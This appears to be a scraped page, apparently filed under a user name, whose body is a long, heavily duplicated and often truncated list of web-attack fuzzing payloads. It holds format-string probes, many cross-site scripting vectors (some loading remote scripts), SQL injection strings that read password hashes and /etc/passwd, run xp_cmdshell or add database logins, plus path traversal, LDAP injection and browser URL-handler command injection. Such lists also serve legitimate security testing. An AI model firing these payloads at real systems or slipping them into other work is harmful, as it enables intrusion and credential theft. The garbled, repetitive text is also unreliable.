Users / A / AivarsSlucis / " or isNULL(1/0) /* " or isNULL(1/0) /* " or isNULL(1/0) /* " or isNULL(1/0) /* ", ", %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%z%t%i%e%g%f%a%c%s%08x%% %%20d %%20n %%20n %%20s %%20s %%20x %.2049d %.2049d %08x %08x %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// %26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// %99999999999s %d%d%d%d %p%p%p%p %p%p%p%p%p%p%p%p%p%p %p%p%p%p%p%p%p%p%p%p %s%p%x%d %s%p%x%d %s%s%s%s %s%s%s%s %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%s%s %x%x%x%x %x%x%x%x %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SC <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SC </TITLE><SCRIPT>alert("XSS");</SCRIPT> </TITLE><SCRIPT>alert("XSS");</SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BASE HREF="javascript:alert('XSS');//"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <BR SIZE="&{alert('XSS')}"> <DIV STYLE="background-image: url(javascript:alert('XSS') <DIV STYLE="width: expression(alert('XSS'));"> <DIV STYLE="background-image: url(javascript:alert('XSS') <DIV STYLE="width: expression(alert('XSS'));"> <HTML xmlns:xss> <?import namespace="xss" implementation="ht <HTML xmlns:xss> <?import namespace="xss" implementation="ht <IFRAME SRC="javascript:alert('XSS');"></IFRAME& <IFRAME SRC="javascript:alert('XSS');"></IFRAME& <IMG DYNSRC="javascript:alert('XSS');"> <IMG DYNSRC="javascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " <IMG SRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariabl <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <IMG SRC=javascript:alert("XSS")> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')" <IMG SRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariabl <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <IMG SRC=javascript:alert("XSS")> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')" <LINK REL="stylesheet" HREF="http://testsite.com/xss.css" <LINK REL="stylesheet" HREF="http://testsite.com/xss.css" <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(& <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;U <META HTTP-EQUIV="Link" Content="<http://testsite.com/xs <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(& <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;U <META HTTP-EQUIV="Link" Content="<http://testsite.com/xs <SCRIPT a=">" SRC="http://testsite.com/xss.js">& <SCRIPT a="blah" '' SRC="http://testsite.com/xss.js& <SCRIPT a=`>` SRC="http://testsite.com/xss.js">& <SCRIPT a=">'>" SRC="http://testsite.com/xss.js& <SCRIPT a=">" SRC="http://testsite.com/xss.js">& <SCRIPT a="blah" '' SRC="http://testsite.com/xss.js& <SCRIPT a=`>` SRC="http://testsite.com/xss.js">& <SCRIPT a=">'>" SRC="http://testsite.com/xss.js& <SCRIPT SRC=http://testsite.com/xss.js></SCRIPT> <SCRIPT SRC=http://testsite.com/xss.js <SCRIPT SRC=http://testsite.com/xss.js></SCRIPT> <SCRIPT SRC=http://testsite.com/xss.js <SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIP <SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIP <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> <STYLE TYPE="text/javascript">alert('XSS');</STY <STYLE type="text/css">BODY{background:url("javascript: <STYLE TYPE="text/javascript">alert('XSS');</STY <STYLE type="text/css">BODY{background:url("javascript: <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE& <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE& <XML ID="xss"><I><B><IMG SRC="javas<!-- -- <XML ID="xss"><I><B><IMG SRC="javas<!-- -- <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(http://testsite.com/xss.htc);& <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(http://testsite.com/xss.htc);& ' -- &password= ' -- &password= ' and 1=( if((load_file(char(110,46,101,120,116))char(39,39)),1,0)); ' and 1=( if((load_file(char(110,46,101,120,116))char(39,39)),1,0)); ' and 1=0) union all ' and 1=0) union all ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_rol ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name) ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_rol ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name) ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_rol ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name) ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_rol ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name) ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_rol ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name) ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_rol ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name) ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_rol ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name) ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_rol ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWN ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name) ' group by userid having 1=1-- ' group by userid having 1=1-- ' having 1=1-- ' having 1=1-- ' or ''=' ' or ''=' ' or '1'='1 ' or '1'='1 ' or '7659'='7659 ' or '7659'='7659 ' or 'a'='a ' or 'a'='a ' or 'text' = n'text' ' or 'text' = n'text' ' or 'unusual' = 'unusual' ' or 'unusual' = 'unusual' ' or 'whatever' in ('whatever') ' or 'whatever' in ('whatever') ' or 1 in (select @@version)-- ' or 1 in (select @@version)-- ' or 1/* ' or 1/* ' or 1=1 -- ' or 1=1 -- ' or 1=1 /* ' or 1=1 /* ' or 1=1-- ' or 1=1-- ' or 1=1-- ' or 1=1-- ' or 2 > 1 ' or 2 > 1 ' or username is not NULL or username = ' ' or username is not NULL or username = ' ' or username like char(37); ' or username like char(37); ' select * from information_schema.tables-- ' select * from information_schema.tables-- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- ' union select ' union select ' union select 1,load_file('/etc/passwd'),1,1,1; ' union select 1,load_file('/etc/passwd'),1,1,1; '';!--"=&{()} '';!--"=&{()} ') or ('a'='a ') or ('a'='a '; exec ('sel' + 'ect us' + 'er') '; exec ('sel' + 'ect us' + 'er') '; exec master..xp_cmdshell 'ping 10.10.1.2'-- '; exec master..xp_cmdshell 'ping 10.10.1.2'-- '; if not((select serverproperty('isintegratedsecurityonly')) 1) waitfor delay '0:0:2' -- '; if not((select serverproperty('isintegratedsecurityonly')) 1) waitfor delay '0:0:2' -- '; if not(select system_user) 'sa' waitfor delay '0:0:2' -- '; if not(select system_user) 'sa' waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) 0) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) 8) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) 0) waitfor delay '0:0:2' -- '; if not(substring((select @@version),25,1) 8) waitfor delay '0:0:2' -- ';//%0da=eval;b=alert;a(b(9));// ';//%0da=eval;b=alert;a(b(9));// ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>alert(4)=&{alert(5)}");} ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>alert(4)=&{alert(5)}");} '];a=eval;b=alert;a(b(15));// '];a=eval;b=alert;a(b(15));// '||'6 '||'6 '||(elt(-3+5,bin(15),ord(10),hex(char(45)))) '||(elt(-3+5,bin(15),ord(10),hex(char(45)))) '||utl_http.request('httP://192.168.1.1/')||' '||utl_http.request('httP://192.168.1.1/')||' '};a=eval;b=alert;a(b(13));// '};a=eval;b=alert;a(b(13));// (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) *(|(objectclass=*)) *(|(objectclass=*)) *)(uid=*))(|(uid=* *)(uid=*))(|(uid=* */* */* */a=eval;b=alert;a(b(/e/.source));/* */a=eval;b=alert;a(b(/e/.source));/* *| *| .1024d /../.. /../../../boot.ini /../.. /../../../boot.ini // // 000%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s>< 000%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s>< 0x100 0x100 0x10000 0x10000 0x3fffffff 0x3fffffff 0x7fffffff 0x7fffffff 0xfffffffe 0xfffffffe 1 and 1=1 1 and 1=1 1 and user_name() = 'dbo' 1 and user_name() = 'dbo' 1 and user_name() = 'dbo' 1 and user_name() = 'dbo' 1 or 1=1 1 or 1=1 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 1'1 1'1 1;a=eval;b=alert;a(b(/c/.source)); 1;a=eval;b=alert;a(b(/c/.source)); 1\'1 1\'1 23 or 1=1; -- 23 or 1=1; -- >"' >"' >%22%27> >%22%27> @import'http://ha.ckers.org/xss.css'; @import'http://ha.ckers.org/xss.css'; @im\port'\ja\vasc\ript:alert("XSS")'; @im\port'\ja\vasc\ript:alert("XSS")'; @im\port'\ja\vasc\ript:alert("XSS")'; @im\port'\ja\vasc\ript:alert("XSS")'; @var select @var as var into temp end -- @var select @var as var into temp end -- a' a' a' or 1=1; -- a' or 1=1; -- A=alert;A(1) A=alert;A(1) aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aaa aaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa admin* admin* aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Sta aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Sta aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Sta alert('xss') alert('xss') alert('XSS'); alert('XSS'); alert(1) alert(1) alert(1) alert(1) alert(1) alert(1) alert(document.cookie); alert(document.cookie); anything' or 'x'='x anything' or 'x'='x BODY{background:url("javascript:alert('XSS')")} BODY{background:url("javascript:alert('XSS')")} copy copy count(/child::node()) count(/child::node()) create user name identified by pass123 temporary tablespace temp default tablespace users; create user name identified by pass123 temporary tablespace temp default tablespace users; delete delete exec sp_addlogin 'name' , 'password' exec sp_addlogin 'name' , 'password' exp/* exp/* firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" get get head head httP://aa">alert(123) httP://aa">alert(123) httP://aaalert(123) httP://aaalert(123) insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) keks li {list-style-image: url("javascript:alert('XSS')");}XSS li {list-style-image: url("javascript:alert('XSS')");}XSS lock lock mkcol mkcol navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozill navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozill navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozill nnosauzumx or 1=1 or 1=1 perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IP perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IP perl -e 'print "alert("XSS")";' > out perl -e 'print "alert("XSS")";' > out propfind propfind qwertyqwop2 search search style=color: expression(alert(0));" a=" style=color: expression(alert(0));" a=" style=color: expression(alert(0));" a=" style=color: expression(alert(0));" a=" uni/**/on sel/**/ect uni/**/on sel/**/ect User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT) User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0) User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727 User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Config User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KH User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like 